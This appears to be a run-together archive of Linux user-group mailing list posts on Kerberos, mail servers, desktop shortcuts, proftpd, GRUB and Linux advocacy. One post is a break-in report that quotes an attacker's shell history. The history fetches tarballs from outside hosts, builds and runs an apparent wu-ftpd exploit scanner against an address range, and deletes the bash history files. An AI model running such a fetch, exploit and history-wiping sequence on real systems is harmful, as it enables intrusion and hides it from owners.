participating in a domain, Microsoft's refusal to share the details of the extensions means that mixed Kerberos domains must use a Windows 2000 DC, instead of a Unix KDC that an organization might prefer. GPL (copylefting) takes care of this by requiring extensions/modifiactions to be turned back into the community. What M$ managed to do is that people having mixed kerberos domains (which is usually the case in corporates/large organisations) "are forced" to use windows KDC which is wrong. Hello, Well, I have been hacked and my /var/log/messages has next to nothing in it. I am keen on getting to this person who did it. Fortunely I have not lost a lot any important data. But first the proof that I have been hacked. /var/log/messages (This is the first line) Nov 18 02:22:53 munshi userdel[8048]: delete user `ftp' Nov 18 02:22:53 munshi userdel[8048]: remove group `ftp' Nov 18 06:24:41 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$Nov 18 06:32:21 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$Nov 18 06:40:01 munshi ddclient[23392]: WARNING: cannot connect to checkip.dyn$ The part after 6:24 is proper, but my net wasnt working at that time (this is a normal thing and I do not susspect the hacker to do this, it is a normal thing and happens almost everyday, I get loggedout from my servers, the network is up but I cant access the internet also other from the outside world cant access my PC), so there are warning messages by my automatic IP updater from 6:24 onwards. What I am amazed is that after an entry at 2:22am there is an entry at 6:24, so someone has definately hacked and deleted the middle section, he probably left the upper part just to misguide us. The .bas* were deleted, but unfortunately for the hacker the .bash_histrory has some important data there, cd /dev/ida/.sys/trojan wget www.geocities.com/master0n/bestwu.tgz tar zxvf bestwu.tgz cd aw make ./awu 24.132 cd .. lsd ls rm -rf aw bestwu.tgz ls wget www.geocities.com/dont_haxer/b.tgz tar zxvf b.tgz rm -rf b.tgz cd .b ./bash ./bash cd /root rm -rf .bas* After that is what I had been doing. So that is the last entry. So my .bash_profile has been deleted and that is how I came to know that something i wrong, I have not rebooted my system as yet, and do not thing it is necessary. There are a few other things that amaze me here are 1. First is the time 2:22am to 6:24am is free where as there should have been entries from ddclient, a program that I am running. 2. The /dev/ida/.sys directory should exist since that is where the above commands have been run and there is no command that is deleting that directory in .bash_history. 3. netstat -a, ps ax are not working since the required libraries are not present, so I cant check which ports are open. Also another amazing thing is that wget was downloading 2nd ISO when I logged in and just downloaded 114MB of it and switchedover to 3rd ISO. INFO Working on RH6.2, full installation. telnet was off, ssh is not there, ddclient may have opened a few ports that I may have not noticed, I just downloaded and installed ddclient just two days back, but it is a perl script, I have not yet gone through that script as yet. Hi, I know I am asking a wrong question just as many have but I am asking just becuse of a little nervousness. I really need help on this one and the only reason I am asking this is to know how much help I will get on any mail server. on this list. I am going live with a complete webhosting and domain name providing service. I need to know which is the best mail server for this purpose. As always the choices are qmail,sendmail, postfix and exim. I have worked with qmail, postfix and sendmail with decreasing order of knowledge about hem. I have never installed exim. Other question is that, does sendmail provide virtual hosting. I have used virtual hosting but that was as system users in sendmail. I want completely transperent virtual hosting. Execute as root on apache

Hello all, I have a script which is going to add a new user to the system. I am using PHP to execute that script, I have a suid on that script (shell script). But I get permission denied in the logs, the page opens well in the browser. I tried the following, changing the owner of the script to apache and root while giving it 711 permission and 4711 permission. But all does not work. It seems that apache just reads the file and execute the commands in it. How can I execute a script in any folder (on the system) as root. Bye.

Hello Luggers, I am developing a cross platform installer in java. I need to create desktop shortcuts and start menu item on Unix/Linux. I am considering KDE, GNOME, Openwin and CDE as target GUI for Unix/Linux systems. I am a newbie for GUI programming on Unix/Linux. Can anybody help me to accomplish this? I am ready for using any native code if required. It will be great if I can get insight with respect to nature and structure of shortcut (link) files. Hi, How about having a tour around the city, visiting as many hardware assemblers and teaching them basic installation of linux (hope we agree on a distribution which we can install in front of them). My hardware vendor have engineers who are prety smart but have never used linux so do not know much about it and can not support my system. Since many assemblers take a risk by giving pirated softwares with their PC's they may like this idea. Also Linux will gain a upper hand in being the first OS that people get on their PC and problems with learning a new OS will not exist for linux anymore. We will be fighting propritary software right the at the root. The negative side will be that their software modems and printers (which are cheaper) will not make a market so they may even resist this. We also can ask them (the assemblers and the new users) to subscribe to our mailing list to ask for help. I would suggest an easy to use distribution like Mandrake, or caldera. I would really prefer caldera since it fits on a single CD and assemblers can easily provide a copy of with every comp they sell. Also caldera has limited number of applications, for example just 1-2 broswers, which can be quiet helpful for newbies to computers, also I have not heard a lot of flames for caldera as there are for RH and mandrake. On the other hand, Mr. Rajeev had a problem with Myson NIC which worked under Mandrake, but the kernel module would not compile under most of the other distributions. This is finally just an idea guys, may be there is something very wrong in this idea and may not work at all. Bye

Hi Trevor, I need to create shortcuts to only HTML files (startup files for installed application). I have KDE and GNOME installed. I searched for the directories and found that KDE Desktop shortcuts are in Desktop directory in user's home. The K menu items are in /usr/share/applnk/. I was able to create Desktop shortcuts for KDE. But... On our system, the "users" group doesn't have write permission on menu directory. Also for GNOME its files are in /usr/share/gnome/apps/ where "users" don't have write permission. My client will be a normal user who will use the installer and should be able to create shortcuts for him without needing special access previlages. I tried to create files in user's home directory but they didn't reflected in start menu. For GNOME I could not create Desktop shortcuts also. If I create them manullay (right click desktop and select new link item) the corresponding files that are created have some generated names like "url13546" etc. and contain a single line like URL: file:/home/kshitij/myfile.htm If I create similar file (say testlink) it doesn't work. proFTP permissions

Hi, I installed proftpd after sufferring from a trojan for wu-ftpd, my problems are as follows 1. I was a different permission for a users file which are being uploaded. So if a user ftp's to my site and uploads the file then it should have 755 permission, (I am hosting a few perl scripts for a friend of mine and would like them to be executable for all) 2. I want to start the server automatically during boot, I did create a ftp file in the xinetd.d as mentioned in its docs dir and restarted the xinetd daemon, but it does not start. Presently I as starting it using rc.local, and it is starting automatically, but I would like to do it the right way either using the tcp wrappers (xinetd) or the BSD style rc?.d/ way. Hi Friends I want to carry out some file system repairs (fsck, badblocks, etc) The problem is that I want to carry out the repairs on my root partition and swap partitions but when my system boots those partitions are already mounted. PS to PDF: argh!

So I have a nice copy of my resume in PS, thanks to Openoffice and a certain OS's printer drivers. But when I convert the PS to PDF in Linux (gs 5.10), I get awful output -- Type 3 fonts in the PDF. Why? Any way to fix? And the workaround seems to be to use gsview on the afore-unmentioned OS and print to PDF -- except the pdfwrite device does not exist. Yes, it IS doable without keeping all the registers in your brain and No you can not do it without assembly. Writing all the important registers on paper would surely help a lot. :) The easiest way is a small hack into the bootloader, which would be then be placed at the start of SDRAM, to take the kernel bootable from some other location in memory. Again, techniques depend from chip to chip. Take your pick. I don't think in this hack you can intervene the loader via serial port/etc/etc and the loader would directly access that location but I am not sure of this feature. Which bootloader would you use? Choose one with minimal appendages. hth _h

Hello everyone, I was busy for a few days and had delivary to my account off for the mailing lists. Is there anything very major happenning on the list? I am using Mandrake 9.0 and something called DevFS starts everytime I boot up my PC. It takes approx 30 seconds of time during bootup. It appears that the port number for yahoo messenger has changed. While windows clients don't have a problem, the linux client has the port number written in its .ymessenger/preferences file Change 5050 to 23 in there. Same is true for everybuddy - change in the preferences window, or in .everybuddy/prefs gaim too probably. cannot boot into GNU/Linux

Hi guys, I am facing somewhat wierd problem. I have Toshiba Laptop (Satellite 1410, Celeron 1.8GHz, 256MB RAM, NVIDIA GeForce4 420 Go Processor with 16 MB VRAM, 30 GB Hitachi IDE Harddisk, Windows XP preinstalled). I partitioned the harddisk using Partition Magic 7.0 into 15GB NTFS C: and 15GB E: FAT32. I installed Redhat 7.2 into that. I made following partitions /boot 100MB / 5GB /usr 3GB /home 3GB /var 3GB swap 512MB actually that much was not needed ... but anyway ;) Now Windows would boot without problem (fortunately) but it would not go to GNU/Linux at all! So I prepared a bootdisk with rawrite and went to rescue mode. I had experimented with GRUB this time which I don't have much idea about ;) In rescue mode it would mount my file system to /mnt/sysimage. To my surprise I found /boot partition empty! No vmlinuz there! Some pages about GRUB had instructed me to type "grub-install" on the command prompt. But that would say "/sbin/grub not found". So I figured probably this was becoz of the mounting the whole file system to /mnt/sysimage. So I saw that grub-install is a shell script I can modify. So I changed some variables to reflect the new mounting. But now it would give message that some file in /mnt/sysimage/usr/i386... is missing! I cannot make head to tail of that message. One mistake that I have done which seems to be quite common, while installing GRUB is I have not labelled the Windows XP partition. Apart from that I got one warning while installing that my architecture may not support the partitioning that I have made. As a GNU/Linux enthusiast I don't want to erase the system that is installed and am trying to find a way to make things work without it as I can. The questions are: 1) Why /boot partition is empty? 2) Why GRUB would not load? 3) What I need to do without going thru the hassels of reinstallation? I am Chetan Ingle working in Rolta india ltd as s/w engg.Working on advanced java and redhat linux.Well When after started working on linux I simply fall in luv with linux and now I fall in luv I don't wanna come back . So I want everything on linux. Well I just read message of Saswat Banerji,I think it's easy to migrate to linux so we can convince customer.I have over 2 years experience on linux and java where i have done same thing like migrating application to linux.The only thing we have to do is give good technical support to customer after migration.Once we do for one customer then remaining customers will be convinced automatically. let me know ur views too.
